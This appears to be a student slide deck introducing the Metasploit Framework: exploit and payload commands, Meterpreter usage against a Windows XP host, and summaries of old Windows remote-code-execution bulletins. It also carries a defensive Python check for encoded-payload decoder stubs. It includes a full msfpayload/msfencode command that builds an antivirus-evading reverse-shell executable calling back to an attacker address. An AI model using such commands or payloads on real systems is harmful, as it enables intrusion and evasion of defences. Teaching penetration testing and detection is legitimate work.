Lê Đức Quyền         08130075
Cao Ngô Nhật thanh   08130081
• “The Metasploit Framework is an advanced open-source for attacking, testing, and using exploit code.”
• Metasploit software helps security and IT professionals identify security issues and verify vulnerabilities in a system.
• Perform penetration tests:
   – Overt penetration testing
   – Covert penetration testing
• Consists of tools, libraries, modules, and user interfaces. These are configured and combined to launch an exploit.
• Written in Ruby.
• Professional approach to penetration testing:
   – Automation
   – Reconnaissance, exploitation
• All-in-one solution:
   – Multi-platform
   – Diverse range of target applications
• Open source:
   – Custom payloads
• Choose the exploit module:
   – show exploits: list the exploits available within the framework
   – use exploit_name: select the exploit
   – info exploit_name: view information about the exploit
• Choose the payload:
   – show payloads: show only the payloads that are compatible with the chosen module
   – info payload_name: view detailed information about the payload
   – set payload payload_name: select the payload
• Configure the chosen payload:
   – show options: view the options that you must configure
   – set option_name value: set an option
   – show advanced: show the advanced options
   – check: verify that the options are configured correctly
   – show targets: list the potential vulnerable targets
   – set TARGET value: choose the target
   – exploit: launch the exploit and attempt to attack the target
Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex commands for exploiting and attacking a remote machine. It accomplishes this by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.
• Fs: provides interaction with the filesystem on the remote machine.
• Net: provides interaction with the network stack on the remote machine.
• Process: provides interaction with processes on the remote machine.
• Sys: provides interaction with the environment on the remote machine.
• screenshot: capture the desktop screen of the victim
• sysinfo: view information about the victim's platform
   meterpreter > sysinfo
   Computer: IHAZSECURITY
   OS      : Windows XP (Build 2600, Service Pack 2).
   Arch    : x86
   Language: en_US
• execute: executes a process on the remote endpoint
• kill: terminates one or more processes on the remote endpoint
• ps: lists processes on the remote endpoint
   meterpreter > execute -f cmd -c
   execute: success, process id is 3516.
   execute: allocated channel 1 for new process.
   meterpreter > interact 1
   interact: Switching to interactive console on 1...
   interact: Started interactive channel 1.
   Microsoft Windows XP [Version 5.1.2600]
   (C) Copyright 1985-2001 Microsoft Corp.

   C:\WINDOWS>ipconfig
• Encoding a payload with msfencode:
   root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe
• Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs.
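Added example (Python, not from the slides): a minimal static check that keys on the GetPC idiom the outermost decoder stub of an encoded payload must keep in the clear, beside a body-content signature that stops matching after a single encoding layer. The fldz/fnstenv/pop bytes are the generic x86 idiom, the XOR masking is a constructed stand-in for one encoding layer (not any real encoder), and every sample buffer is constructed rather than real shellcode.

```python
"""Static check for the FPU GetPC idiom carried by self-decoding x86 stubs."""
import re

# fnstenv [esp-0xc] assembles to D9 74 24 F4. A self-decoding stub runs an FPU
# instruction, then fnstenv, so the saved FPU instruction pointer lands at [esp]
# and a following pop gives the stub its own address before the decode loop.
FNSTENV_GETPC = b"\xd9\x74\x24\xf4"

# Require a 32-bit pop (58..5F = pop eax..edi) within 8 bytes after fnstenv;
# plain fnstenv also occurs in ordinary compiled FPU code, so gate on the pop.
GETPC_STUB = re.compile(rb"\xd9\x74\x24\xf4.{0,8}?[\x58-\x5f]", re.DOTALL)

# Constructed stand-in for a cleartext payload-body signature (not a real
# shellcode pattern); a real rule would carry a vendor's content match here.
BODY_SIGNATURE = b"CONSTRUCTED-BODY-MARKER"


def find_getpc_stubs(buf: bytes) -> list[int]:
    """Offsets of every fnstenv-then-pop sequence found in buf."""
    return [m.start() for m in GETPC_STUB.finditer(buf)]


def classify(buf: bytes) -> dict:
    """Summarise what a signature-only scanner can and cannot see in buf."""
    stubs = find_getpc_stubs(buf)
    body_visible = BODY_SIGNATURE in buf
    return {
        "getpc_stub_offsets": stubs,
        "cleartext_body": body_visible,
        # Either finding flags the buffer; the two fail in different cases.
        "suspicious": bool(stubs) or body_visible,
    }


def mask_body(body: bytes, key: int = 0x5A) -> bytes:
    """Constructed stand-in for one encoding layer: a fixed-key XOR over the
    body. It only shows why a body signature stops matching once the bytes are
    transformed, while the decoder placed in front of it stays in the clear."""
    return bytes(b ^ key for b in body)


# Constructed samples (not real payloads):
# 1. a cleartext body with no decoder stub in front of it
PLAIN_SAMPLE = b"\x90" * 16 + BODY_SIGNATURE + b"\x90" * 16

# 2. the same body behind a stub: fldz; fnstenv [esp-0xc]; pop ebx; masked body.
#    Re-encoding this whole buffer again would hide this stub too, but the new
#    outermost stub would again need its own GetPC in the clear.
STUB = b"\xd9\xee" + FNSTENV_GETPC + b"\x5b"
ENCODED_SAMPLE = b"\x90" * 8 + STUB + mask_body(BODY_SIGNATURE)

# 3. fnstenv used without the pop idiom (constructed stand-in for benign code)
BENIGN_FPU = b"\xd9\xee" + FNSTENV_GETPC + b"\x90" * 12 + b"\xc3"


if __name__ == "__main__":
    for name, sample in (("plain", PLAIN_SAMPLE),
                         ("encoded", ENCODED_SAMPLE),
                         ("benign", BENIGN_FPU)):
        print(name, classify(sample))
```

The point for detection engineering is that the body signature catches only the plain sample, the stub signature catches only the encoded one, and the benign FPU sample is cleared by the pop requirement; a behavioural sandbox or an in-memory scan after the stub has run is what removes the dependence on either signature.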
• Vulnerability in Server Service Could Allow Remote Code Execution (958644)
• The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code.
• Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.
• http://technet.microsoft.com/en-us/security/bulletin/ms08-067
LSASS Vulnerability - CAN-2003-0533
Impact of vulnerability: Remote Code Execution
An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges.
This vulnerability is caused by an unchecked buffer in the LSASS service.
• This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts.
• Systems are only vulnerable to remote attack when sharing a printer and the remote attacker can access the printer share.
• This vulnerability is caused when the Windows Print Spooler insufficiently restricts user permissions to access print spoolers.
• Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.
• http://technet.microsoft.com/en-us/security/bulletin/MS10-061
• This vulnerability is caused because the Windows RPCSS service does not properly check message inputs under certain circumstances. After establishing a connection, an attacker could send a specially crafted malformed RPC message to cause the underlying Distributed Component Object Model (DCOM) process on the remote system to fail in such a way that arbitrary code could be executed.
• To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593, or any other specifically configured RPC port on the remote machine.
• Best practices recommend blocking all TCP/IP ports that are not actually being used.
• A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.
• http://technet.microsoft.com/en-us/security/bulletin/MS08-041
Metasploit framework

Editor's notes

  1. interact 1: start a session on the channel just established with the remote machine.
  2. Severity ratings for the Snapshot Viewer vulnerability (slide 18) by affected software:
     Affected software                    | Maximum severity | Impact                | Aggregate severity
     Snapshot Viewer for Microsoft Access | Critical         | Remote Code Execution | Critical
     Microsoft Office Access 2000         | Critical         | Remote Code Execution | Critical
     Microsoft Office Access 2002         | Critical         | Remote Code Execution | Critical
     Microsoft Office Access 2003         | Critical         | Remote Code Execution | Critical